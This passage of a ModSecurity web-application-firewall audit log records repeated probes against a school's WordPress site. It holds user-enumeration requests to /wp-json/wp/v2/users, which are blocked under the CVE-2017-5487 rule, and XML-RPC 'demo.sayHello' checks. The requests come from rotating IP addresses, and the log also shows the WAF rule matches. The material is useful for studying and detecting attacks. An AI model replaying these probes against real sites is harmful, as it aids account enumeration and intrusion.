Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6acc2f28-Z-- --396d0654-A-- [17/May/2025:02:40:37 +0700] aCeUtce47ocjCGWTS4Y-8AAAAEo 103.236.140.4 54076 103.236.140.4 8181 --396d0654-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --396d0654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --396d0654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424437828134 3265 (- - -) Stopwatch2: 1747424437828134 3265; combined=1384, p1=478, p2=874, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --396d0654-Z-- --81229b55-A-- [17/May/2025:02:40:44 +0700] aCeUvMe47ocjCGWTS4Y-8QAAAEc 103.236.140.4 54080 103.236.140.4 8181 --81229b55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --81229b55-C-- demo.sayHello --81229b55-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --81229b55-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424444343159 5003 (- - -) Stopwatch2: 1747424444343159 5003; combined=3786, p1=488, p2=3091, p3=26, p4=29, p5=90, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81229b55-Z-- --9cb7cd54-A-- [17/May/2025:02:41:06 +0700] aCeU0thEtho3ciA0wehdwwAAAJY 103.236.140.4 54084 103.236.140.4 8181 --9cb7cd54-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9cb7cd54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cb7cd54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424466954035 3311 (- - -) Stopwatch2: 1747424466954035 3311; combined=1388, p1=454, p2=900, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb7cd54-Z-- --5cd5f06c-A-- [17/May/2025:02:41:12 +0700] aCeU2NhEtho3ciA0wehdxQAAAJI 103.236.140.4 54088 103.236.140.4 8181 --5cd5f06c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5cd5f06c-C-- demo.sayHello --5cd5f06c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cd5f06c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424472577580 5264 (- - -) Stopwatch2: 1747424472577580 5264; combined=3980, p1=504, p2=3263, p3=29, p4=32, p5=90, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cd5f06c-Z-- --22ebfb4d-A-- [17/May/2025:02:41:30 +0700] aCeU6thEtho3ciA0wehdxgAAAJc 103.236.140.4 54098 103.236.140.4 8181 --22ebfb4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --22ebfb4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ebfb4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424490822868 2258 (- - -) Stopwatch2: 1747424490822868 2258; combined=1013, p1=323, p2=668, p3=0, p4=0, p5=22, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ebfb4d-Z-- --28b9684a-A-- [17/May/2025:02:41:36 +0700] aCeU8Me47ocjCGWTS4Y-8gAAAEw 103.236.140.4 54102 103.236.140.4 8181 --28b9684a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --28b9684a-C-- demo.sayHello --28b9684a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --28b9684a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424496288504 5179 (- - -) Stopwatch2: 1747424496288504 5179; combined=3932, p1=443, p2=3270, p3=28, p4=31, p5=93, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28b9684a-Z-- --36b79620-A-- [17/May/2025:02:41:43 +0700] aCeU99hEtho3ciA0wehdyQAAAIQ 103.236.140.4 54106 103.236.140.4 8181 --36b79620-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36b79620-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36b79620-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424503941073 3110 (- - -) Stopwatch2: 1747424503941073 3110; combined=1309, p1=467, p2=813, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36b79620-Z-- --17dad23c-A-- [17/May/2025:02:41:49 +0700] aCeU_UE0LfP59mkCzg419AAAANg 103.236.140.4 54110 103.236.140.4 8181 --17dad23c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17dad23c-C-- demo.sayHello --17dad23c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17dad23c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424509142038 6134 (- - -) Stopwatch2: 1747424509142038 6134; combined=4507, p1=612, p2=3622, p3=32, p4=37, p5=117, sr=132, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17dad23c-Z-- --2bf78938-A-- [17/May/2025:02:42:08 +0700] aCeVENhEtho3ciA0wehdywAAAI4 103.236.140.4 54114 103.236.140.4 8181 --2bf78938-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2bf78938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bf78938-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424528489554 2773 (- - -) Stopwatch2: 1747424528489554 2773; combined=1265, p1=430, p2=805, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bf78938-Z-- --466a2c62-A-- [17/May/2025:02:42:13 +0700] aCeVFdhEtho3ciA0wehdzQAAAJA 103.236.140.4 54118 103.236.140.4 8181 --466a2c62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --466a2c62-C-- demo.sayHello --466a2c62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --466a2c62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424533856157 4983 (- - -) Stopwatch2: 1747424533856157 4983; combined=3854, p1=500, p2=3150, p3=25, p4=26, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --466a2c62-Z-- --1e41aa09-A-- [17/May/2025:02:42:18 +0700] aCeVGse47ocjCGWTS4Y-9AAAAFA 103.236.140.4 54122 103.236.140.4 8181 --1e41aa09-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e41aa09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e41aa09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424538295025 2826 (- - -) Stopwatch2: 1747424538295025 2826; combined=1263, p1=454, p2=778, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e41aa09-Z-- --822b130f-A-- [17/May/2025:02:42:24 +0700] aCeVINhEtho3ciA0wehd0AAAAI8 103.236.140.4 54126 103.236.140.4 8181 --822b130f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --822b130f-C-- demo.sayHello --822b130f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --822b130f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424544842819 6718 (- - -) Stopwatch2: 1747424544842819 6718; combined=4661, p1=624, p2=3788, p3=37, p4=41, p5=101, sr=81, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --822b130f-Z-- --1cf0e96b-A-- [17/May/2025:02:42:27 +0700] aCeVI9hEtho3ciA0wehd0QAAAJM 103.236.140.4 54128 103.236.140.4 8181 --1cf0e96b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1cf0e96b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1cf0e96b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424547285692 2355 (- - -) Stopwatch2: 1747424547285692 2355; combined=1116, p1=347, p2=725, p3=0, p4=0, p5=43, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cf0e96b-Z-- --1a00a26c-A-- [17/May/2025:02:42:32 +0700] aCeVKMe47ocjCGWTS4Y-9QAAAEk 103.236.140.4 54134 103.236.140.4 8181 --1a00a26c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1a00a26c-C-- demo.sayHello --1a00a26c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a00a26c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424552508280 4751 (- - -) Stopwatch2: 1747424552508280 4751; combined=3651, p1=443, p2=3009, p3=23, p4=25, p5=89, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a00a26c-Z-- --10f3ef7b-A-- [17/May/2025:02:43:04 +0700] aCeVSNhEtho3ciA0wehd1AAAAI0 103.236.140.4 54138 103.236.140.4 8181 --10f3ef7b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10f3ef7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10f3ef7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424584426523 3031 (- - -) Stopwatch2: 1747424584426523 3031; combined=1343, p1=431, p2=876, p3=0, p4=0, p5=35, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10f3ef7b-Z-- --e75b2d72-A-- [17/May/2025:02:43:12 +0700] aCeVUNhEtho3ciA0wehd2QAAAIU 103.236.140.4 54154 103.236.140.4 8181 --e75b2d72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e75b2d72-C-- demo.sayHello --e75b2d72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e75b2d72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424592416375 5986 (- - -) Stopwatch2: 1747424592416375 5986; combined=4457, p1=550, p2=3677, p3=33, p4=38, p5=95, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e75b2d72-Z-- --b387083f-A-- [17/May/2025:02:43:24 +0700] aCeVXNhEtho3ciA0wehd2gAAAII 103.236.140.4 54158 103.236.140.4 8181 --b387083f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b387083f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b387083f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri 